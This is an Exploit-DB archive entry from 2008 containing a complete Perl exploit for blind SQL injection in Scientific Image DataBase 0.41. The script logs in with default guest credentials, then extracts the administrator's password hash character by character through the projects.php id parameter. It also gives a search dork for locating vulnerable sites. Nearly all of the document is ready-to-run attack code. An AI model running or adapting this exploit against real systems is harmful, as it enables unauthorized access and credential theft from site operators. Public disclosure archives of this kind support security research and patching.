Scientific Image DataBase 0.41 - Blind SQL Injection

EDB-ID:

5885

Author:

t0pP8uZz

Type:

webapps

Platform:

PHP

Published:

2008-06-21

#!/usr/bin/perl

use strict;
use warnings;
use LWP::UserAgent;

# Download: http://sidb.sourceforge.net/
# Dork: "Scientific Image DataBase"
# This exploit retrives the admin username/password via blind mysql injection.


print <<INFO; # heredocs is ugly.. so is my INFO ;)
-------------------------------------
- Scientific Image DataBase <= 0.41 -
-    Blind SQL Injection Exploit    -
-                                   -
- Coded && Discovered By: t0pP8uZz  -
-    Discovered On: 19 JUNE 2008    -
-------------------------------------
-Greetz: muts, perlunderground, h-y -
-          cipher, milw0rm          -
-------------------------------------

INFO

print "Enter URL(ie: http://site.com): ";
    chomp(my $url=<STDIN>);

my ($substr, $done, $chr, $res) = (1, 1, 48, "");

my $ua = LWP::UserAgent->new( agent => 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)', cookie_jar => {} );
$ua->post($url."/login.php", { 'logon' => 'true', 'user' => 'guest', 'pwd' => 'guest', 'submit' => 'Login' } );

while($done) {
    my $content = $ua->get($url."/projects.php?show=true&id=57%20and%20ascii(substring((select%20pwd%20from%20users%20where%20userid=1),".$substr.",1))=".$chr);
    	
    if($content->content =~ /Not meant/ && length($res) == 32) { $done = 0; }
    elsif($content->content !~ /Not meant/) { $res .= chr($chr); $substr++; $chr = 48; }
    else { $chr++; }
}
print "Username: sysadmin  Password: ".$res."\n";
exit;

# milw0rm.com [2008-06-21]